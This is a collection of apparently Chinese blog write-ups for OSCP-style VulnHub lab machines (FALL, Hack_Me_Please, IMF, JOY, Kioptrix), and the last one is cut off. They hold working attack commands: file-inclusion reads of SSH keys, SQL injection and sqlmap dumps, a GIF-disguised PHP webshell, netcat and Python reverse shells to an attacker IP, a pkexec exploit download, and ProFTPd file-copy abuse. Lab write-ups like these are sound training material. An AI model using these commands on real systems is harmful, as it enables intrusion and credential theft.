FALL，wfuzz对参数的模糊测试 【oscp】FALL，wfuzz对参数的模糊测试靶机地址：https://www.vulnhub.com/entry/digitalworldlocal-fall,726/连接好kali，主机发现 & 端口扫描，发现了两个http服务，一个是80端口一个9090端口这是80界面这是9090界面随便点点，文件包含伪协议如下（利用失败）php://filter/read=convert.base64-encode/resource=index.php php://filter/resource=index.php php://filter/string.strip_tags|convert.base64-decode/resource=shell.php data://text/plain,<?php%20phpinfo();?> data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b file:///etc/passwd http://127.0.0.1/cmd.php?cmd=php://input POST数据：<?php phpinfo()?>看到网站底部，2.2.15版本漏洞检索，但是需要鉴权我们并没有登录后台这里看到一个用户发送的一个消息，留着有一个后门接下来进行目录扫描，发现有一个test.phpdirsearch -u http://10.10.10.199利用wfuzz工具，对参数进行爆破，并筛选出响应长度在100到100000之间的结果wfuzz -u http://10.10.10.200/test.php?FUZZ=/etc/passwd -w /data/SecLists_Dict/Discovery/Web-Content/small_common.txt --ss "^(.{100,100000})$"此时发现有一个file参数，访问payload，并发现写那篇文章的qiu用户，curl http://10.10.10.200/test.php?file=/etc/passwd查看是否存在id_rsa，这个文件呢是私匙，在linux中它非常的敏感，如果用户泄露了此文件，那么攻击者就可以利用此文件免密登录服务器，通过下面的命令，可以看到目标服务器泄露了此用户的文件curl http://10.10.10.200/test.php?file=/home/qiu/.ssh/id_rsa确保私钥文件的权限被严格限制。通常，私钥文件的权限应设置为 600（只有所有者可以读写），否则可能利用不成功。curl http://10.10.10.200/test.php?file=/home/qiu/.ssh/id_rsa > qiu chmod 600 qiu ssh qiu@10.10.10.200 -i qiu登录成功后，进行内网信息收集，外网还有一个9090端口的web，那么就来看数据库配置，密码为P@ssw0rdINSANITY查看表数据mysql> select * from cms_users -> ; +---------+----------+----------------------------------+--------------+------------+-----------+----------------------+--------+---------------------+---------------------+ | user_id | username | password | admin_access | first_name | last_name | email | active | create_date | modified_date | +---------+----------+----------------------------------+--------------+------------+-----------+----------------------+--------+---------------------+---------------------+ | 1 | qiu | bc8b9059c13582d649d3d9e48c16d67f | 1 | qiu qing | chan | qiu@goodtech.inc | 1 | 2021-05-21 17:06:29 | 2021-05-22 02:28:53 | | 2 | patrick | 6aea70cc6a678f0f83a82e1c753d7764 | 1 | Patrick | Ong | patrick@goodtech.inc | 1 | 2021-05-22 02:28:33 | 2021-05-22 16:54:13 | +---------+----------+----------------------------------+--------------+------------+-----------+----------------------+--------+---------------------+---------------------+ 2 rows in set (0.00 sec)解密失败基本信息收集uname -a hostname # 主机名 # 系统信息相关 lsb_release -a cat /etc/os-release cat /proc/version # 权限相关 sudo -l # 查看可以使用sudo的文件 find / -perm -4000 -print 2>/dev/null # 查找 SUID文件 ls -al /etc/cron* # 查看所有计划任务 find / -perm 777 -type f 2>/dev/null # 查看文件权限为777的文件信息 # 其他信息收集 ps -aux netstat -tulnp history 直到历史命令测试sudo，提权成功（之前的mysql服务器密码也可以尝试）往期推荐不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学防溯源小技巧ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略【oscp】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式【内网渗透】ICMP隧道技术，ICMP封装穿透防火墙上线MSF/CS【渗透测试】linux隐身登录

Hack_Me_Please，js信息泄露，二级目录遍历 【oscp】Hack_Me_Please，js信息泄露，二级目录遍历靶机地址：https://www.vulnhub.com/entry/hack-me-please-1,731/外网打点主机发现&端口扫描80端口这是一个静态页面mysql测试是否可以远程连接（可）Tips ：ERROR 2026 (HY000): TLS/SSL error: self-signed certificate in certificate chAIn，这个错误表示客户端与服务器之间建立安全连接时出现的SSL/TLS 证书验证错误解决办法通常有两种方法： 添加参数 --skip-ssl 添加参数 --ssl-mode=DISABLED 目录扫描看到一个html，不是php写的，进行目录爆破的时候就需要用到wfuzz或者gobuster既然是静态页面，那么我们直接打开控制台，这里注释信息有一个 /seeddms51x/seeddms-5.1.22///确保这个js文件与我们服务器端点上安装的应用相同：/seeddms51x/seeddms-5.1.22/访问这个应用http://10.10.10.201/seeddms51x/seeddms-5.1.22/经过一些列折腾后' or 1=1 --+ ' or 1=1 -- + ' or 1=1# " or 1=1 --+ " or 1=1 -- + " || 1=1 -- + " || 1=1 --+ " || 1=1 #继续信息收集，发现可以对这个上级目录进行扫描gobuster dir -u http://10.10.10.201/seeddms51x -w /data/SecLists_Dict/Discovery/Web-Content/directory-list-1.0.txt -x html,txt,php,js开放了，三个目录/conf /www /pear/conf/settings.xml丢给AI总结（注意oscp考试绝对不允许使用AI）有了数据库密码，那么就远程登录┌──(root㉿kali)-[/data/demo] └─# mysql -u seeddms -h 10.10.10.201 --skip-ssl -p Enter password: Welcome to the MariaDB monitor. Commands end with ; or g. Your MySQL connection id is 72 Server version: 8.0.25-0ubuntu0.20.04.1 (ubuntu) Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Support MariaDB developers by giving a star at https://github.com/MariaDB/server Type 'help;' or 'h' for help. Type 'c' to clear the current input statement. MySQL [(none)]> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | mysql | | performance_schema | | seeddms | | sys | +--------------------+ 5 rows in set (0.006 sec) MySQL [(none)]> use seeddms Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed MySQL [seeddms]> show tables; +------------------------------+ | Tables_in_seeddms | +------------------------------+ | tblACLs | | tblAttributeDefinitions | | tblCategory | | tblDocumentApproveLog | ------------------------------------------- | tblWorkflowTransitions | | tblWorkflows | | users | +------------------------------+ 43 rows in set (0.002 sec) MySQL [seeddms]> select * from users; +-------------+---------------------+--------------------+-----------------+ | Employee_id | Employee_first_name | Employee_last_name | Employee_passwd | +-------------+---------------------+--------------------+-----------------+ | 1 | saket | saurav | Saket@#$1337 | +-------------+---------------------+--------------------+-----------------+ 1 row in set (0.002 sec)发现Saket@#$1337登录不成功 MySQL [seeddms]> select * from tblUsers; +----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+ | id | login | pwd | fullName | emAIl | language | theme | comment | role | hidden | pwdExpiration | loginfAIlures | disabled | quota | homefolder | +----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+ | 1 | admin | f9ef2c539bad8a6d2f3432b6d49ab51a | Administrator | address@server.com | en_GB | | | 1 | 0 | 2021-07-13 00:12:25 | 0 | 0 | 0 | NULL | | 2 | guest | NULL | Guest User | NULL | | | | 2 | 0 | NULL | 0 | 0 | 0 | NULL | +----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+ 2 rows in set (0.001 sec)解密失败，那还有一种方法就是修改数据了修改密码为123456 md5加密后e10adc3949ba59abbe56e057f20f883eupdate tblUsers set pwd='e10adc3949ba59abbe56e057f20f883e' where login='admin';修改后就能登录了在mysql中还有一个信息是必须要收集的（这个配置不当能够直接getshell）MySQL [seeddms]> SHOW VARIABLES LIKE 'secure_file_priv'; +------------------+-----------------------+ | Variable_name | Value | +------------------+-----------------------+ | secure_file_priv | /var/lib/mysql-files/ | +------------------+-----------------------+ 1 row in set (0.019 sec)继续登录的后台，点击添加文档，发现能上传文件我们使用weevely生成一个php静态木马（它具有跨平台、隐蔽性好[增加免杀率]、支持多种功能等特点）weevely generate cmd shell.php把他上传上去那么这个shell路径怎么获取呢，这里可以检索一下历史漏洞，这里有一个命令执行查看一下需要获取文档ID example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd完整payload如下http://10.10.10.201/seeddms51x/data/1048576/10/1.php内网渗透使用weevely连接webshellweevely terminal http://10.10.10.201/seeddms51x/data/1048576/10/1.php cmd反弹shellrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.10.128 1234 >/tmp/f创建交互式终端python2 -c 'import pty; pty.spawn("/bin/bash")';内网信息收集的时候，看到一个logrotate计划任务www-data@ubuntu:/var/www/html/seeddms51x/data/1048576/10$ ls -al /etc/cron* ls -al /etc/cron* -rw-r--r-- 1 root root 1042 Feb 13 2020 /etc/crontab /etc/cron.d: total 36 drwxr-xr-x 2 root root 4096 Jul 2 2021 . drwxr-xr-x 133 root root 12288 Jul 3 2021 .. -rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder -rw-r--r-- 1 root root 285 Jul 16 2019 anacron -rw-r--r-- 1 root root 201 Feb 13 2020 e2scrub_all -rw-r--r-- 1 root root 712 Jun 20 2021 php -rw-r--r-- 1 root root 191 Jul 2 2021 popularity-contest /etc/cron.dAIly: total 68 drwxr-xr-x 2 root root 4096 Jul 2 2021 . drwxr-xr-x 133 root root 12288 Jul 3 2021 .. -rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder -rwxr-xr-x 1 root root 311 Jul 16 2019 0anacron -rwxr-xr-x 1 root root 539 Apr 13 2020 apache2 -rwxr-xr-x 1 root root 376 Dec 4 2019 apport -rwxr-xr-x 1 root root 1478 Apr 9 2020 apt-compat -rwxr-xr-x 1 root root 355 Dec 29 2017 bsdmAInutils -rwxr-xr-x 1 root root 384 Nov 19 2019 cracklib-runtime -rwxr-xr-x 1 root root 1187 Sep 5 2019 dpkg -rwxr-xr-x 1 root root 377 Jan 21 2019 logrotate -rwxr-xr-x 1 root root 1123 Feb 25 2020 man-db -rwxr-xr-x 1 root root 4574 Jul 18 2019 popularity-contest -rwxr-xr-x 1 root root 214 Dec 7 2020 update-notifier-common www-data@ubuntu:/var/www/html/seeddms51x/data/1048576/10$ logrotate --version logrotate --version logrotate 3.14.0 Default mAIl command: /usr/bin/mAIl Default compress command: /bin/gzip Default uncompress command: /bin/gunzip Default compress extension: .gz Default state file path: /var/lib/logrotate/status ACL support: yes SELinux support: yes很遗憾，这个利用不了，版本太新（高）了然后我想到了刚进来的那个网页moonlight，这里有一个权限提升POC为c#计算机语言，大概率不适用于Linux想想看哪里还没有利用这是之前mysql中的用户表，存在一个用户Saket@#$1337我们查看/etc/passwd，是存在这个用户的www-data@ubuntu:/var/www/html/seeddms51x/seeddms-5.1.22$ su saket su saket Password: Saket@#$1337 To run a command as administrator (user "root"), use "sudo <command>". See "man sudo_root" for detAIls. saket@ubuntu:/var/www/html/seeddms51x/seeddms-5.1.22$ saket@ubuntu:/var/www/html/seeddms51x/seeddms-5.1.22$ sudo -l sudo -l [sudo] password for saket: Saket@#$1337 Matching Defaults entries for saket on ubuntu: env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin User saket may run the following commands on ubuntu: (ALL : ALL) ALL saket@ubuntu:/var/www/html/seeddms51x/seeddms-5.1.22$ sudo -i sudo -i root@ubuntu:~# whoami whoami root至此提权成功。往期推荐往期推荐不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学防溯源小技巧ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略【oscp】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式【内网渗透】ICMP隧道技术，ICMP封装穿透防火墙上线MSF/CS【渗透测试】Linux隐身登录

IMF缓冲区提权渗透 IMF缓冲区提权渗透靶机地址：https://www.vulnhub.com/entry/imf-1,162/靶机难度：中级（CTF）服务端口扫描访问80端口端口服务探测，能下手的只有80端口这儿只找到一个关于，联系我们只有一个80端口，本次靶机考核的应该就不是xss，可以直接跳过下面似乎有三个用户查看源码，这儿有一个flag1{YWxsdGhlZmlsZXM=}解码看看得到明文：allthefiles网页上也没有其他东西了，用dirsearch进行目录扫描试试表面上没有任何信息了，但又肯定存在其他信息，只能对源码进行审计Place favicon.ico and apple-touch-icon.avif in the root directory将favicon.ico和appletouch -icon.avif放在根目录下直到看到这些编码信息将前面两个两个拼凑在一起ZmxhZzJ7YVcxbVlXUnRhVzVwYzNS后面的那个就普通解码，得到后半部分flag合起来就是，这里还是一个flagflag2{aW1mYWRtaW5pc3RyYXRvcg==}继续解码，imfadministrator，这个结果可能是密码信息，但是网页上并没有登录的功能，22端口也没有开启那么就是目录了这里不清楚用户名的话，还记得刚刚页面上的信息嘛，第一个是导演，第二个是副主任，第三个是参谋长先目录扫描一下，看看能不能越权不行sql注入，万能密码现在唯一没有利用上的就是第一个flag明文，可能是密码吧，allthefiles，但是也没有效果，继续查看源码I couldn't get the SQL working, so I hard-coded the password. It's still mad secure through. - Roger我无法使SQL工作，所以我硬编码了密码。还是很安全的。——罗杰这不是又是一个用户名，用户名不存在（无效的用户名），这又是一个漏洞点试试刚刚的用户（导演 rmichaels，副主任 akeith，参谋长 estone），导演为密码错误副主任 akeith 无效的用户名参谋长 estone ，不存在看样子只有导演能登陆了，用burp爆破社区版很慢，考试只能用社区版，还有啥办法嘞，可以试试 hydra ，之前都是爆破一些协议，没有对http请求的内容进行爆破，这个还真没试过，我是菜鸡分析页面信息 页面登录错误的信息为Invalid登录失败的表单数据那么就能得到hydra的参数详解hydra -l rmichaels -P /usr/share/wordlists/fasttrack.txt -t 4 -vV 192.168.209.132 http-post-form "/imfadministrator/index.php:user=^USER^&pass=^PASS^:Invalid"都失败了hydra：调用 Hydra 工具。-l rmichaels：指定单个用户名为 rmichaels。这意味着 Hydra 将使用 rmichaels 作为用户名进行所有尝试。-P /usr/share/wordlists/fasttrack.txt：指定密码字典文件为 /usr/share/wordlists/fasttrack.txt。Hydra 将从这个文件中读取密码，逐个尝试。-t 4：设置同时运行的线程数为 4。这可以提高破解效率，但同时也会增加对目标服务器的负载。-vV：显示详细的过程信息。这有助于了解 Hydra 的运行状态和尝试的用户名/密码组合。192.168.209.132：目标服务器的 IP 地址。http-post-form：指定服务类型为 HTTP POST 表单。"/imfadministrator/index.php:user=^USER^&pass=^PASS^:Invalid"：指定表单路径、参数和错误消息。/imfadministrator/index.php：表单的路径。这是目标服务器上处理登录请求的 PHP 文件的路径。user=^USER^&pass=^PASS^：表单的参数。^USER^ 和 ^PASS^ 是占位符，分别表示用户名和密码。Hydra 会将这些占位符替换为实际的用户名和密码进行尝试。Invalid：错误消息。当表单返回该消息时，表示登录失败。Hydra 会根据这个错误消息来判断当前尝试的用户名和密码是否有效。使用强加密的话，可以利用php的特性，进行绕过得到了flag3flag3{Y29udGludWVUT2Ntcw==}解密后的明文：continueTOcms进入到home试试文件包含file协议data协议php://filter伪协议sql注入测试，得到sql语法错误的结果，这里没有回显数据（暂定为盲注）继续添加参数，普通的盲注是行不通的，这里要在后面再添加一个单引号我们换一个页面试试，看看能不能找到其他回显数据，进一步判断是否可以使用其他类型的注入（找其他信息，尽量不要盲注，因为在oscp考试中，禁止使用商业化工具比如sqlmap），用order by行不通看样子是利用这个pagename，回显html数据的，这里发现一个union联合查询注入当前数据库http://192.168.209.132/imfadministrator/cms.php?pagename=11111' union select concat(database())'# # admin接下来有一个很离谱的事儿，就是利用group_concat(111)能正常回显是吧，并且后面的sql语句没有报错但是我一换成table_name就完蛋啦，无奈自能用sqlmap了sqlmap脚本如下sqlmap -u 'http://192.168.209.132/imfadministrator/cms.php?pagename=disavowlist' -p 'pagename' --dbms 'mysql' --level 3 --cookie 'PHPSESSID=rcvl9o0565ni5ub2ki19i1vcu3' --dump可以看到这里是存在联合注入的访问一下，错误。。。。不管了看数据这里有一个二维码，扫扫看得到flag4，flag4{dXBsb2Fkcjk0Mi5waHA=}解码为一个php文件有一个文件上传burp抓包burp爆破文件后缀，普通的一句话木马不行，那么就需要进行绕过webshell的绕过工具weevelyweevely generate <password> <path>把木马放到windows上进行上传，尝试各种的上传方法，只有图片格式的可以上传，还需要添加文件头欺骗但是我们并不知道文件的名称，有一个uploads文件夹，刚刚dirsearch扫出来的，查看上传成功的源码，dab037ffb2eb这里访问图片只有图片马，还需要一个文件包含的漏洞才可以getshell（找个半天没有。。。），但是gif不一样了写入一句话木马echo 'GIF89a <?php $cmd=$_GET['cmd']; echo `$cmd`; ?>' > cmd.gif上传http://192.168.209.132/imfadministrator/uploads/dfd5fb101707.gif?cmd=idls 查看当前目录，发现flag5，flag5_abc123def.txtcat flag5_abc123def.txthttp://192.168.209.132/imfadministrator/uploads/dfd5fb101707.gif?cmd=cat%20flag5_abc123def.txtflag5{YWdlbnRzZXJ2aWNlcw==} # 解码 agentservices利用python3反弹shellexport RHOST="192.168.209.130";export RPORT=6666;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'系统信息收集，ubuntu 16.04 版本但是这些exp都不行，这里提权有两种方法，一个是cve-2021-4034，一个是缓冲区溢出exp提权，kaligit clone https://github.com/arthepsy/CVE-2021-4034.git靶机wget 192.168.209.130:5000/cve-2021-4034-poc.c gcc -o exp cve-2021-4034-poc.c ./exp第二种方法缓冲区溢出提权，看看参考文章吧，这里我的“敲门”服务开启端口失败了，可能是因为我用了提权脚本的问题。附两篇写的比较好的文章参考（都是缓冲区溢出的）：https://www.freebuf.com/articles/system/329028.htmlhttps://blog.csdn.net/ericalezl/article/details/131797477往期推荐往期推荐不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学防溯源小技巧ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略【oscp】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式【内网渗透】ICMP隧道技术，ICMP封装穿透防火墙上线MSF/CS【渗透测试】linux隐身登录

JOY，ProFTPd的拷贝漏洞 【oscp】JOY，ProFTPd的拷贝漏洞下载地址：https://www.vulnhub.com/entry/digitalworldlocal-joy,298/主机发现&端口扫描直接访问，泄露版本信息上漏洞检索，只有一个拒绝服务攻击，并不能直接getshell，切换思路端口详细扫描，发现了一个FTP匿名登录nmap -sS 10.10.10.198 -T4 -p- -A登录ftpftp 10.10.10.198 # 密码为空，直接回车看到两个可执行文件，下载下来get reminder get directory赋予执行权限（并不能直接执行）直接cat directory，看上去是用户patrick的用户目录，毕竟有一个上级目录就是root权限的信息Patrick's Directory total 132 drwxr-xr-x 18 patrick patrick 4096 Feb 4 21:20 . drwxr-xr-x 4 root root 4096 Jan 6 2019 .. -rw-r--r-- 1 patrick patrick 24 Feb 4 21:15 1kd8va0o50OV3H28HZ26ffN7JMeU0wG8J996ftHpRuQrAAQqKoxQfCs5aB8GFXC7.txt -rw-r--r-- 1 patrick patrick 24 Feb 4 20:55 6kK0S15FpM4iECwlY9vBMOcz0WHalkAEQZIHFBUDxztRq1We1v5GYxAMdxMbUba6.txt -rw-r--r-- 1 patrick patrick 0 Feb 4 21:15 aOY5oYk9g0WS0nXasU6l2EvjrFCl4hqk.txt -rw------- 1 patrick patrick 185 Jan 28 2019 .bash_history -rw-r--r-- 1 patrick patrick 220 Dec 23 2018 .bash_logout -rw-r--r-- 1 patrick patrick 3526 Dec 23 2018 .bashrc drwx------ 7 patrick patrick 4096 Jan 10 2019 .cache -rw-r--r-- 1 patrick patrick 0 Feb 4 20:50 chTSFHiKgRfHiwgp8LV9u4tDwhpdGnKp.txt drwx------ 10 patrick patrick 4096 Dec 26 2018 .config drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Desktop drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Documents drwxr-xr-x 3 patrick patrick 4096 Jan 6 2019 Downloads -rw-r--r-- 1 patrick patrick 0 Feb 4 21:20 Dp9d3TstWJP6Yczetnrx4GnQgkVE250L.txt -rw-r--r-- 1 patrick patrick 24 Feb 4 20:50 gAOnh9TLwMyOEViffEXpFAt3LcChEuxcWeqc3BPcQFIRomrGdizTYKuJlHuOSF4z.txt drwx------ 3 patrick patrick 4096 Dec 26 2018 .gnupg -rwxrwxrwx 1 patrick patrick 0 Jan 9 2019 haha -rw------- 1 patrick patrick 8532 Jan 28 2019 .ICEauthority drwxr-xr-x 3 patrick patrick 4096 Dec 26 2018 .local drwx------ 5 patrick patrick 4096 Dec 28 2018 .mozilla drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Music drwxr-xr-x 2 patrick patrick 4096 Jan 8 2019 .nano -rw-r--r-- 1 patrick patrick 24 Feb 4 21:05 obzvvHxWWlOzg8z8uOdy2Qd94dVMZAs2glSOp18HRCRl9jqmB4x5PVoqLsqM0sAD.txt drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Pictures -rw-r--r-- 1 patrick patrick 675 Dec 23 2018 .profile drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Public -rw-r--r-- 1 patrick patrick 0 Feb 4 21:05 Q9lbdQPPywIiNT5Dagi0Bg9OMx0CQ0ts.txt d--------- 2 root root 4096 Jan 9 2019 script drwx------ 2 patrick patrick 4096 Dec 26 2018 .ssh -rw-r--r-- 1 patrick patrick 0 Jan 6 2019 Sun drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Templates -rw-r--r-- 1 patrick patrick 0 Jan 6 2019 .txt -rw-r--r-- 1 patrick patrick 24 Feb 4 21:20 UKwKOJqE9XVI3TaEvKZJr8CWu1kVXOWTFZQqjhaiES7QydPE1KEcY2bzuLsOpnYc.txt -rw-r--r-- 1 patrick patrick 0 Feb 4 21:00 V56ziCPycMNIbNplkqYedQXlM6G9YO66.txt -rw-r--r-- 1 patrick patrick 407 Jan 27 2019 version_control drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Videos -rw-r--r-- 1 patrick patrick 0 Feb 4 21:10 Wp2Twcw4FWSRMYDe8mniQ1BZhHyhYHqX.txt -rw-r--r-- 1 patrick patrick 0 Feb 4 20:55 XFsA7qBE2voGAtiuZfQ0GQMxE8RitITZ.txt -rw-r--r-- 1 patrick patrick 24 Feb 4 21:10 YbxpYyx2v9VnifKxuctWG1Y3BzXp8dGJrQrlXbDHK0qp0ZcBRudy7zzN2g8Rxc9F.txt -rw-r--r-- 1 patrick patrick 24 Feb 4 21:00 YPE8Q4kbBE98OJCytjadCwhK2W9TMb5UPnCP0cHnGsS2dvpwXrppfAViwZmPH3Zq.txt You should know where the directory can be accessed. Information of this Machine! Linux JOY 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux另外一个reminder，目前可能用不上，有一个version_control包含了版本信息的文件┌──(root㉿kali)-[/data/demo] └─# cat reminder Lock down this machine!继续信息收集，目录扫描（没有利用方式）dirsearch -u http://10.10.10.198/ossec/这里需要利用到一个ProFTPd的拷贝漏洞，这样就能从ftp服务器上下载version_control这个版本文件了相关学习文章：https://www.freebuf.com/column/209238.html┌──(root㉿kali)-[~] └─# telnet 10.10.10.198 21 Trying 10.10.10.198... Connected to 10.10.10.198. Escape character is '^]'. 220 The Good Tech Inc. FTP Server site cpfr /home/patrick/version_control 350 File or directory exists, ready for destination name site cpto /home/ftp/upload/version_control 250 Copy successful quit 221 Goodbye. Connection closed by foreign host.此时再登录FTP服务器，就能看到多出了一个文件信息# 下载 get version_control找到服务版本了，ProFTPd，1.3.5┌──(root㉿kali)-[~] └─# cat version_control Version Control of External-Facing Services: Apache: 2.4.25 Dropbear SSH: 0.34 ProFTPd: 1.3.5 Samba: 4.5.12 We should switch to OpenSSH and upgrade ProFTPd. Note that we have some other configurations in this machine. 1. The webroot is no longer /var/www/html. We have changed it to /var/www/tryingharderisjoy. 2. I am trying to perform some simple bash scripting tutorials. Let me see how it turns out.复制到当前目录下并执行searchsploit -m 36803 python2 36803.py执行脚本的时候它直接卡在这儿了查看脚本内容，这是一个网站的目录这个目录呢在刚刚的版本文件version_control中也有 /var/www/tryingharderisjoy.┌──(root㉿kali)-[~] └─# cat version_control Version Control of External-Facing Services: Apache: 2.4.25 Dropbear SSH: 0.34 ProFTPd: 1.3.5 Samba: 4.5.12 We should switch to OpenSSH and upgrade ProFTPd. Note that we have some other configurations in this machine. 1. The webroot is no longer /var/www/html. We have changed it to /var/www/tryingharderisjoy. 2. I am trying to perform some simple bash scripting tutorials. Let me see how it turns out.但还是不行，MSF可以利用，这里不做过多解释，继续手动我们得知了网站的目录/var/www/tryingharderisjoy，那么就利用刚刚的文件复制漏洞命令如下┌──(root㉿kali)-[/usr/share/webshells/php] └─# telnet 10.10.10.198 21 Trying 10.10.10.198... Connected to 10.10.10.198. Escape character is '^]'. 220 The Good Tech Inc. FTP Server site cpfr /home/ftp/upload/php-reverse-shell.php 350 File or directory exists, ready for destination name site cpto /var/www/tryingharderisjoy/php-reverse-shell.php 250 Copy successful quit 221 Goodbye. Connection closed by foreign host.反弹成功开始提权，在网站根目录下面看到了patricksecretsofjoy文件包含了账号密码信息www-data@JOY:/var/www/tryingharderisjoy/ossec$ ls -al ls -al total 116 drwxr-xr-x 8 www-data www-data 4096 Jan 6 2019 . drwxr-xr-x 3 www-data www-data 4096 Feb 4 22:41 .. -rw-r--r-- 1 www-data www-data 92 Jul 19 2016 .hgtags -rw-r--r-- 1 www-data www-data 262 Dec 28 2018 .htaccess -rw-r--r-- 1 www-data www-data 44 Dec 28 2018 .htpasswd -rwxr-xr-x 1 www-data www-data 317 Jul 19 2016 CONTRIB -rw-r--r-- 1 www-data www-data 35745 Jul 19 2016 LICENSE -rw-r--r-- 1 www-data www-data 2106 Jul 19 2016 README -rw-r--r-- 1 www-data www-data 923 Jul 19 2016 README.search drwxr-xr-x 3 www-data www-data 4096 Jul 19 2016 css -rw-r--r-- 1 www-data www-data 218 Jul 19 2016 htaccess_def.txt drwxr-xr-x 2 www-data www-data 4096 Jul 19 2016 img -rwxr-xr-x 1 www-data www-data 5177 Jul 19 2016 index.php drwxr-xr-x 2 www-data www-data 4096 Jul 19 2016 js drwxr-xr-x 3 www-data www-data 4096 Dec 28 2018 lib -rw-r--r-- 1 www-data www-data 462 Jul 19 2016 ossec_conf.php -rw-r--r-- 1 www-data www-data 134 Jan 6 2019 patricksecretsofjoy -rwxr-xr-x 1 www-data www-data 2471 Jul 19 2016 setup.sh drwxr-xr-x 2 www-data www-data 4096 Dec 28 2018 site drwxrwxrwx 2 www-data www-data 4096 Feb 4 21:32 tmp www-data@JOY:/var/www/tryingharderisjoy/ossec$ cat .htpasswd cat .htpasswd admin:$apr1$3Jv2Ok6H$4BMdXenVBmD2E3kXe8RVL. www-data@JOY:/var/www/tryingharderisjoy/ossec$ cat patricksecretsofjoy cat patricksecretsofjoy credentials for JOY: patrick:apollo098765 root:howtheheckdoiknowwhattherootpasswordis how would these hack3rs ever find such a page? www-data@JOY:/var/www/tryingharderisjoy/ossec$ su root su root Password: howtheheckdoiknowwhattherootpasswordis su: Authentication failure www-data@JOY:/var/www/tryingharderisjoy/ossec$ su patrick su patrick Password: apollo098765 patrick@JOY:/var/www/tryingharderisjoy/ossec$ whoami whoami patrick有了密码直接sudo -l，看样子可以直接利用这个test文件提权了，但是这个目录无法访问，没有权限不要忘了我们怎么进来的，这里可以利用刚刚的任意文件复制漏洞，进行复制呀cd ~ echo 'php /var/www/tryingharderisjoy/php-reverse-shell.php' > testkali┌──(root㉿kali)-[~] └─# telnet 10.10.10.198 21 Trying 10.10.10.198... Connected to 10.10.10.198. Escape character is '^]'. 220 The Good Tech Inc. FTP Server site cpfr /home/patrick/test 350 File or directory exists, ready for destination name site cpto /home/patrick/script/test 250 Copy successful quit 221 Goodbye. Connection closed by foreign host.靶机提权即可 sudo /home/patrick/script/testkali┌──(root㉿kali)-[~] └─# nc -lvnp 1234 listening on [any] 1234 ... connect to [10.10.10.128] from (UNKNOWN) [10.10.10.198] 44710 Linux JOY 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux 23:13:50 up 2:28, 0 users, load average: 0.04, 0.05, 0.04 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=0(root) gid=0(root) groups=0(root) /bin/sh: 0: can't access tty; job control turned off # whoami root #至此提权成功往期推荐往期推荐不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学防溯源小技巧ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略【oscp】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式【内网渗透】ICMP隧道技术，ICMP封装穿透防火墙上线MSF/CS【渗透测试】Linux隐身登录

Kioptrix 提权靶机（1-5）全系列教程，Try Harder！ 【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！emmm 什么是OSCP？是由OffSec公司提供的一个专业级别的道德黑客认证。它是针对渗透测试的专业认证，旨在验证个人在实际环境中进行渗透测试的能力。与其他理论导向的认证不同，OSCP侧重于实践技能和真实世界情景的模拟。它也叫做国际进攻性安全认证，如果有想要报考OSCP的师傅们欢迎咨询我们安全团队，我们给您打骨折。本次教程靶机如下，都准备好了，直接下载就好，并且解决了官方靶机扫描不到的问题：链接：https://pan.quark.cn/s/475209fc0c05level 1主机发现上一步没有加-sV参数，这里加上之后的信息看看80有什么随便点点啥也没有，有个METGT2.9.5不知道能不能用得上再点点有个php文件，啥用没有不管啥服务都搜一搜利用这个poc，有版本区间了，用用第二个用户名枚举的poc发现是用得python2pip也不存在，看样子用不了了，我们换一个mod_ssl 刚刚使用nmap -sV参数扫出来的版本信息，还有谷歌插件wapplayer信息收集插件，都能看到这个mod_ssl使用第一个exp，这里看到有提示信息按照他的提示信息，我敲，这谁顶得住啊，这提示信息，看不懂，跳过，直接下载，艹复制下载链接，可以发现这个单词变成了download 下载的意思，直接下载刚刚searchsploit 的 exp文件换一个，卧槽这谁顶得住啊官方编译好的都执行不了，等我换个kali。。。。。24小时后。。。。。卧槽还是不行等我仔细看看exp报错信息，他说的是 } 